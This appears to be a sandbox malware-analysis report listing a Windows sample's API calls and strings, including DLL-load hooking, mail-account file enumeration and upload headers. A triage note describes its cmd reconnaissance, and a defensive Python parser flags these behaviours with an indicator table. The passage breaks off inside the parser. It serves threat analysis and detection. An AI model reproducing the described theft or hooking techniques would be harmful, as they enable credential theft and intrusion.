  • Part of subcall function 00450B1C: LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 00450BC7
  • Part of subcall function 00450B1C: FreeLibrary.KERNEL32(00000000), ref: 00450BD2
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
• String ID: 8F$8F
• API String ID: 1711133254-1100261700

APIs
  • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
  • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
• lstrlenW.KERNEL32(00000000,00000000,00000000,%APPDATA%\Microsoft\,?), ref: 0045AF98
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0045AFAA
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0045AFC7
• lstrlenW.KERNEL32(00000000), ref: 0045AFD3
• HeapFree.KERNEL32(00000000,00000000), ref: 0045AFE7
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
• String ID: %APPDATA%\Microsoft\
• API String ID: 3403466626-2699254172

APIs
• lstrlenW.KERNEL32(00001000,.dll,00000000,00000000,00462CFE,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 004421C8
• lstrlen.KERNEL32(DllRegisterServer), ref: 004421D6
• RtlAllocateHeap.NTDLL(00000000,00000022), ref: 004421EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$AllocateHeap
• String ID: .dll$DllRegisterServer$_iF
• API String ID: 3070124600-441603667

APIs
  • Part of subcall function 0045383E: lstrlen.KERNEL32(74B05520,00000008,?,00000000,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5), ref: 0045384A
  • Part of subcall function 0045383E: memcpy.NTDLL(00000000,74B05520,74B05520,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000), ref: 004538A8
  • Part of subcall function 0045383E: lstrcpy.KERNEL32(00000000,00000000), ref: 004538B8
• lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 0045DFEB
• wsprintfA.USER32 ref: 0045E01B
• GetLastError.KERNEL32 ref: 0045E090
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
• String ID: Content-Type: application/octet-stream$SmF$`
• API String ID: 324226357-537911964

APIs
• OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0044AA1E
• CreateWaitableTimerA.KERNEL32(0046E0F8,?,?), ref: 0044AA3B
• GetLastError.KERNEL32(?,?), ref: 0044AA4C
  • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
  • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
  • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
  • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
• GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 0044AA8C
• SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 0044AAAB
• HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0044AAC1
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
• String ID:
• API String ID: 1835239314-0

APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 004571B9
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 004571CA
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 004571E5
• GetLastError.KERNEL32 ref: 004571FB
• HeapFree.KERNEL32(00000000,?), ref: 0045720D
• HeapFree.KERNEL32(00000000,?), ref: 00457222
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
• String ID:
• API String ID: 1822509305-0

APIs
• OpenProcess.KERNEL32(00000E39,00000000,?), ref: 00448A1D
• _strupr.NTDLL ref: 00448A58
• lstrlen.KERNEL32(00000000), ref: 00448A60
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00448AA0
• CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 00448AA7
• GetLastError.KERNEL32 ref: 00448AAF
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
• String ID:
• API String ID: 110452925-0

APIs
• lstrlen.KERNEL32(?), ref: 00443FE2
• RtlAllocateHeap.NTDLL(00000000,00000009), ref: 00443FF5
• lstrcpy.KERNEL32(00000008,?), ref: 00444017
• GetLastError.KERNEL32(004455EB,00000000,00000000), ref: 00444040
• HeapFree.KERNEL32(00000000,00000000), ref: 00444058
• CloseHandle.KERNEL32(00000000,004455EB,00000000,00000000), ref: 00444061
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
• String ID:
• API String ID: 2860611006-0
• Opcode ID: 24c05f4931769e02d7e36d9e8765fe7aa30ae5413b1f80f67ed4b305ec26ecf7
• Instruction ID: c97da9052ca06b1f89f63e1e6a8fb3225165780aeac279da94104f1cd4f3ffb4
• Opcode Fuzzy Hash: 24c05f4931769e02d7e36d9e8765fe7aa30ae5413b1f80f67ed4b305ec26ecf7
• Instruction Fuzzy Hash: D811B171500305EFEB109F65DC88AABBBB8FB403617114A3EF516C3250EB758D15CB6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
• GetCurrentThreadId.KERNEL32 ref: 0046070C
• GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
• GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
• lstrcpy.KERNEL32(00000000), ref: 00460748
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
• String ID:
• API String ID: 1175089793-0
• Opcode ID: a257d5a73ce356d9de82d5b32fefa7e611dbecad235fc62a2a8a130b4c0d6b86
• Instruction ID: 0ea2ebffd594429196bfabb1e702e1e1fff5b92bb770db8f14f4d5aef6eb8e12
• Opcode Fuzzy Hash: a257d5a73ce356d9de82d5b32fefa7e611dbecad235fc62a2a8a130b4c0d6b86
• Instruction Fuzzy Hash: 07018C725001156BD7115B669C48DAB37ACDF81745705052AFA05E3201FFB4FC058BBE
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLastmemset
• String ID: vids
• API String ID: 3276359510-3767230166
• Opcode ID: b19ef3502a9f686fc35f999bb9be9355934ffbfc781e869b64237e3db000aeea
• Instruction ID: c05c776b540a8a37af267d94cb56bad7dc00cfa32aa0998cf40ddc2b416e30f9
• Opcode Fuzzy Hash: b19ef3502a9f686fc35f999bb9be9355934ffbfc781e869b64237e3db000aeea
• Instruction Fuzzy Hash: 488137B1D002299FDB20DFA5C98099EBBB8FF09704F11816BF805A7251D7789A45CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0045DBB2: lstrlen.KERNEL32(?,?,?,?,00442927,?), ref: 0045DBBB
  • Part of subcall function 0045DBB2: mbstowcs.NTDLL ref: 0045DBE2
  • Part of subcall function 0045DBB2: memset.NTDLL ref: 0045DBF4
• GetVersion.KERNEL32(?), ref: 00442933
• GetLastError.KERNEL32(?), ref: 00442A8F
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLastVersionlstrlenmbstowcsmemset
• String ID: !mF$+mF$?mF
• API String ID: 4097109750-969985946
• Opcode ID: 8a35173dc37f62cf5cbbeafd5b7ad6b24e98ebe00c7564790a5bfb51fc498ae9
• Instruction ID: 5131c015e16620704e0f95731a1f1d49add90d9e3cb3cf981e1f2af3895d1632
• Opcode Fuzzy Hash: 8a35173dc37f62cf5cbbeafd5b7ad6b24e98ebe00c7564790a5bfb51fc498ae9
• Instruction Fuzzy Hash: 7A4161B1600206AFFB30DFA1DD45AAB3BA8EF04740F40452AFA41D6150E7B4EE44CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 004610E8
• FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 0046114F
• GetLastError.KERNEL32(?,00000000,00000000), ref: 00461159
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: BuffersErrorFileFlushLastmemset
• String ID: K$P
• API String ID: 3817869962-420285281
• Opcode ID: 8b1bb919600eb1b7d1f0b40d33f291534dc821935d261a743b23a485de8fc184
• Instruction ID: 3f2add002db807d590961badd591a158512c84aa5e4b9715f18d019f8ffc59a6
• Opcode Fuzzy Hash: 8b1bb919600eb1b7d1f0b40d33f291534dc821935d261a743b23a485de8fc184
• Instruction Fuzzy Hash: FC419231A007459FDB24CFA4C9846AFBBF1BF19704F18892ED58693750F738A904CB56
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0045B39A: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,00000000), ref: 0045B3A8
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F24B
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0045F29A
  • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
  • Part of subcall function 0044178F: GetLastError.KERNEL32 ref: 004417DA
  • Part of subcall function 0044178F: WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
  • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
  • Part of subcall function 0044178F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
  • Part of subcall function 0044178F: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
  • Part of subcall function 0044178F: SetEndOfFile.KERNEL32(?), ref: 0044186A
  • Part of subcall function 0044178F: CloseHandle.KERNEL32(?), ref: 00441882
• HeapFree.KERNEL32(00000000,00000000,?,?,?,00461792,?,?,?,?,?,00000000,?,00000000,?,00459362), ref: 0045F2CF
• HeapFree.KERNEL32(00000000,?,?,?,?,00461792,?,?,?,?,?,00000000,?,00000000,?,00459362), ref: 0045F2DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
• String ID: https://
• API String ID: 4200334623-4275131719
• Opcode ID: c458ee829cec9bdaca956a78bba2728483c98f890e0b026417ea2d8ac1b56d52
• Instruction ID: a529bb9eb41209f8c02757da273ab665420b8bdea68067e71aed947696755f88
• Opcode Fuzzy Hash: c458ee829cec9bdaca956a78bba2728483c98f890e0b026417ea2d8ac1b56d52
• Instruction Fuzzy Hash: 3C3169B5A10119FFEB009F94CC89CAEBB7DFB08350B100469F905D3260EBB1AE55DBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00452F08
• memcpy.NTDLL(00000018,?,?), ref: 00452F31
• RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000FD5F,00000000,000000FF,00000008), ref: 00452F70
• HeapFree.KERNEL32(00000000,00000000), ref: 00452F83
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
• String ID: ]hF
• API String ID: 2780211928-2847826427
• Opcode ID: e23118ad13a7c72592cb5058b773502cc5f4fc78ec81f6dd0e94ff72048fef6f
• Instruction ID: 577cd01bc7243b9aba2e02697c02cef90bfe5b214846a77fa51c130db83fae3e
• Opcode Fuzzy Hash: e23118ad13a7c72592cb5058b773502cc5f4fc78ec81f6dd0e94ff72048fef6f
• Instruction Fuzzy Hash: 2F319371600205AFDB208F15EC44B9B7BB8FF15321F00452AF816C63A0E7B4DC15DBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00448CBF: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 00448CFB
  • Part of subcall function 00448CBF: memset.NTDLL ref: 00448D77
  • Part of subcall function 00448CBF: memset.NTDLL ref: 00448D8C
• RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 004572BA
• lstrcmpi.KERNEL32(00000000,Main), ref: 004572DA
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0045731F
• HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00457330
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$Freememset$Allocatelstrcmpimemcpy
• String ID: Main
• API String ID: 1065503980-521822810
• Opcode ID: 972a8bcda193331ffd3a0cdf3feda712d241d695c3f03c1f69a5f4ce7d30c6cb
• Instruction ID: 930ccc8cae34110e46fd4542f8682b95673116b09274946a617ae167cc67e5df
• Opcode Fuzzy Hash: 972a8bcda193331ffd3a0cdf3feda712d241d695c3f03c1f69a5f4ce7d30c6cb
• Instruction Fuzzy Hash: 9E219131A00205FBDF109FA1EC45E9E7B79EF04319F00447AFD05A6162EB789E59DB19
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,77E49EB0,00000000,?,?,?,?,00000000,004423A2), ref: 00450B2D
• LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 00450BC7
• FreeLibrary.KERNEL32(00000000), ref: 00450BD2
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Library$FreeHandleLoadModule
• String ID: NTDLL.DLL$NTDSAPI.DLL
• API String ID: 2140536961-3558519346
• Opcode ID: 8243a03721c8e2ab0392b70ac0ebb7940c60a26f00d9f15d9fb8496cf73396df
• Instruction ID: ea88723a65c61f94bfc754e717ac0001043e2c40c5201570a576b54c6ab13951
• Opcode Fuzzy Hash: 8243a03721c8e2ab0392b70ac0ebb7940c60a26f00d9f15d9fb8496cf73396df
• Instruction Fuzzy Hash: 3D316BB59043028FD714CF68C484B6BB7E0FB9431AF14496EE88587352E774E94DCB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00446B8D: GetTickCount.KERNEL32 ref: 00446BA3
  • Part of subcall function 00446B8D: wsprintfA.USER32 ref: 00446BE4
  • Part of subcall function 00446B8D: GetModuleHandleA.KERNEL32(00000000), ref: 00446BF6
• GetModuleHandleA.KERNEL32(00000000,?), ref: 0044FC5B
• GetLastError.KERNEL32 ref: 0044FC75
• RtlExitUserThread.NTDLL(?), ref: 0044FC8F
• GetLastError.KERNEL32 ref: 0044FCCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
• String ID: iF
• API String ID: 1798890819-3484524759
• Opcode ID: f0be38e2cc482e6dd7f18b68a5833faf58302323093061194cda9fd744d05164
• Instruction ID: d99c54cd816606fcb5a49cc287cf8eafd5ab3f67a588ab65f027c50b1d7694f0
• Opcode Fuzzy Hash: f0be38e2cc482e6dd7f18b68a5833faf58302323093061194cda9fd744d05164
• Instruction Fuzzy Hash: 6B118171504249AFE7109F25DD88C7B7BBCFE867507040A2EF952C2150EB649C09CB3B
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000000,?,00000008,?,?,?,0044B7D1,?,?), ref: 0045DC18
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• mbstowcs.NTDLL ref: 0045DC34
• lstrlen.KERNEL32(account{*}.oeaccount), ref: 0045DC42
• mbstowcs.NTDLL ref: 0045DC5A
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
  • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
  • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
  • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
  • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
  • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
• String ID: account{*}.oeaccount
• API String ID: 1961997177-4234512180
• Opcode ID: 73a52570dfaea2eee4db5a2a5c28169c2622981eb02861072c7fbe0956162374
• Instruction ID: 4968a2e9aae9b1a5bdabce0e4f4955a6706a930ef6b6de990f4a9228392d401c
• Opcode Fuzzy Hash: 73a52570dfaea2eee4db5a2a5c28169c2622981eb02861072c7fbe0956162374
• Instruction Fuzzy Hash: 95018872D00204B6DB21ABA68C46F9F7BBCFF45355F14412AB905A3152EA79D908C664
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00010000), ref: 004432E6
• lstrlen.KERNEL32(EMPTY,00000008,00000000,0000010E,00000000,?), ref: 0044331A
• HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000), ref: 00443336
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFreelstrlen
• String ID: EMPTY$log
• API String ID: 3886119090-141014656
• Opcode ID: b4d4927905294cb22629f153efb7936057f28b34b41f6afe524cd511f38b0741
• Instruction ID: b56edb3ba6d2525a41bb8f45cb1fdc1832b88d78de1b8f8b83b0dc18fb5cce6f
• Opcode Fuzzy Hash: b4d4927905294cb22629f153efb7936057f28b34b41f6afe524cd511f38b0741
• Instruction Fuzzy Hash: 4101F971A00254BBDB219F969C4CD9B7B6CDB85B52B100437F901D2111EAB54E44D67A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(0046E220,0045D680), ref: 0045903C
• GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification), ref: 00459050
• GetProcAddress.KERNEL32(00000000), ref: 00459057
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: AddressHandleModuleProcVersion
• String ID: LdrRegisterDllNotification$NTDLL.DLL
• API String ID: 3310240892-3368964806
• Opcode ID: d52d849f36cba69b7e8c1f06e5522154db69a1c7e12ed2251b736777cd734197
• Instruction ID: a426e5283d56c12843078da8e71e5f3fed3834735488e16da53e4673720d696c
• Opcode Fuzzy Hash: d52d849f36cba69b7e8c1f06e5522154db69a1c7e12ed2251b736777cd734197
• Instruction Fuzzy Hash: D5018870200301DFD7509F758C487467BE5AB46705F14C47ED944C72A3EBB8C8498B1E
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.NTDLL(0046E268), ref: 004445D8
• Sleep.KERNEL32(0000000A), ref: 004445E2
• SetEvent.KERNEL32 ref: 00444639
• RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00444658
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalSection$EnterEventLeaveSleep
• String ID: 0dF
• API String ID: 1925615494-1157920388
• Opcode ID: 2893d74a66a5d22f1b8f6c31e4d664905ce0e8553a7b4e6feabeb439d27d873c
• Instruction ID: dc7dfa7134daa9fa464412ff5bd9aa4abb7cc8877f8d703b65700c284b0ae6c3
• Opcode Fuzzy Hash: 2893d74a66a5d22f1b8f6c31e4d664905ce0e8553a7b4e6feabeb439d27d873c
• Instruction Fuzzy Hash: 79015EB4A40214BBFB10AB62EC05B6A3BACEB15701F104437F605D6190FBF99A04DA9F
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(?,00000000,74B5F720,?,0044AB61,00000000,?,?,?,00445505), ref: 0046388F
• GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,0044AB61,00000000,?,?,?,00445505), ref: 004638A3
• GetProcAddress.KERNEL32(00000000), ref: 004638AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: AddressHandleModuleProcVersion
• String ID: LdrUnregisterDllNotification$NTDLL.DLL
• API String ID: 3310240892-3940208311
• Opcode ID: 57c0a1a0e2e9379145cc75e8670c9bdc4c63164736bea7892f3615d405deeec4
• Instruction ID: 5810e0595268a38d5940a9623df1dd9a5a6f5ea2f3a0a003bbb72a65d851e00f
• Opcode Fuzzy Hash: 57c0a1a0e2e9379145cc75e8670c9bdc4c63164736bea7892f3615d405deeec4
• Instruction Fuzzy Hash: 33018F752002009FD710AF6AEC88A96B7EDFB4A301315886FF14687321EB79FD01CB5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(0046DF60,00000000), ref: 00446090
• RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 004460AB
• lstrcpy.KERNEL32(00000000,-01), ref: 004460CC
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 004460ED
  • Part of subcall function 0044A704: SetEvent.KERNEL32(?,00461363), ref: 0044A718
  • Part of subcall function 0044A704: WaitForSingleObject.KERNEL32(000000FF,000000FF,?), ref: 0044A732
  • Part of subcall function 0044A704: CloseHandle.KERNEL32(00000000), ref: 0044A73B
  • Part of subcall function 0044A704: CloseHandle.KERNEL32(?,?), ref: 0044A749
  • Part of subcall function 0044A704: RtlEnterCriticalSection.NTDLL(?), ref: 0044A755
  • Part of subcall function 0044A704: RtlLeaveCriticalSection.NTDLL(?), ref: 0044A77E
  • Part of subcall function 0044A704: CloseHandle.KERNEL32(?), ref: 0044A79A
  • Part of subcall function 0044A704: LocalFree.KERNEL32(?), ref: 0044A7A8
  • Part of subcall function 0044A704: RtlDeleteCriticalSection.NTDLL(?), ref: 0044A7B2
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
• String ID: -01
• API String ID: 1103286547-1095514728
• Opcode ID: 56a1f166d4037e5321b9b8d601ef3a3d829ffec0a8b2b083be5272d084227312
• Instruction ID: bafa4dfcf5190cec33c52bf284a41e3d3f1374af707af49324d0b64bb2146687
• Opcode Fuzzy Hash: 56a1f166d4037e5321b9b8d601ef3a3d829ffec0a8b2b083be5272d084227312
• Instruction Fuzzy Hash: BCF01231F8035077D6311766AC0AF0B2A55EB59B61F150536F605A62E1EDA88848C6AF
Uniqueness
Uniqueness Score: -1.00%
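
Triage note: the per-function blocks in this listing are where the sample's intent becomes readable (an NTDSAPI.DLL probe, a GetProcAddress lookup of LdrRegisterDllNotification so later-loaded modules can be hooked, enumeration of account{*}.oeaccount files, and a cmd /C wrapper that runs reg.exe query, driverquery.exe, tasklist.exe /SVC and nslookup with output redirected to a file). The following parser is an added example written for this page; it is not part of the Joe Sandbox report and not the sample's code. It reads the "• Name.MODULE(args), ref: ADDR" and "Part of subcall function XXXXXXXX:" lines exactly as printed here, then scores each block against a small indicator table. SAMPLE is an excerpt copied from three of this listing's function blocks; the indicator table, the regular expressions and the descriptions attached to each indicator are the editor's own assumptions, not report output.

```python
"""Parse Joe Sandbox per-function API listings and flag behaviours.

Added example; not part of the Joe Sandbox report. SAMPLE is copied from the
listing, the INDICATORS table is constructed for this example.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line as printed in the report, e.g.
#   • LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 00450BC7
#   • Part of subcall function 00446B8D: GetTickCount.KERNEL32 ref: 00446BA3
API_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The "$"-separated strings printed under Similarity.
STRING_ID = re.compile(r"^\s*[•*-]\s*String ID:\s*(?P<ids>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                          # call-site address from the report
    subcall_of: Optional[str] = None  # set for "Part of subcall function" lines


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Start a new block at each 'APIs' header and parse the lines below it."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(ApiCall(m.group("name"), m.group("module"),
                                         args, m.group("ref"), m.group("sub")))
            continue
        m = STRING_ID.match(line)
        if m:
            current.strings = [s for s in m.group("ids").split("$") if s]
    return blocks


# Constructed indicator table (regex over a block's strings and call
# arguments, description). Patterns come from strings visible in the report;
# the descriptions are the editor's reading of them, not Joe Sandbox output.
INDICATORS = [
    (r"LdrRegisterDllNotification",
     "registers a DLL-load notification callback (hooking later-loaded modules)"),
    (r"LdrUnregisterDllNotification", "removes a DLL-load notification callback"),
    (r"\bcmd /C\b", "runs commands through cmd.exe"),
    (r"reg\.exe query|driverquery\.exe|tasklist\.exe|nslookup ",
     "host reconnaissance commands redirected to a file"),
    (r"\.oeaccount", "enumerates Outlook Express / Windows Mail account files"),
    (r"NTDSAPI\.DLL", "probes for NTDSAPI.DLL (Active Directory client API)"),
]


def flag_block(block: FunctionBlock) -> List[str]:
    """Descriptions of every indicator matching the block's strings or arguments."""
    haystack = " ".join(block.strings + [",".join(c.args) for c in block.calls])
    return [desc for pat, desc in INDICATORS if re.search(pat, haystack)]


def summarize(text: str) -> List[dict]:
    """One dict per block: direct call sites, API names and matched flags."""
    return [{"refs": [c.ref for c in b.calls if c.subcall_of is None],
             "apis": [c.name for c in b.calls],
             "flags": flag_block(b)} for b in parse_blocks(text)]


# Excerpt copied from three function blocks of this report (constructed input
# for the example; the Similarity/Uniqueness lines are omitted).
SAMPLE = r"""
APIs
• GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,77E49EB0,00000000,?,?,?,?,00000000,004423A2), ref: 00450B2D
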